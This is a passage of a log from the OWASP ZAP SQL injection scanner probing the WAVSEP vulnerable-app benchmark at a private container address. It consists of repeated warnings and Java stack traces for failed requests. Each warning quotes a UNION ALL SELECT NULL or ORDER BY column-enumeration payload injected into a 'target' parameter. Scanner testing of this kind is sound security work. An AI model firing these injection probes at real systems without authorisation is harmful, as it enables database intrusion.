org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681855 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681856 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681856 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681857 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681858 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681858 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681859 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681860 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681860 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1871#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1871# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681861 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681862 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681862 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681863 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) UNION ALL SELECT 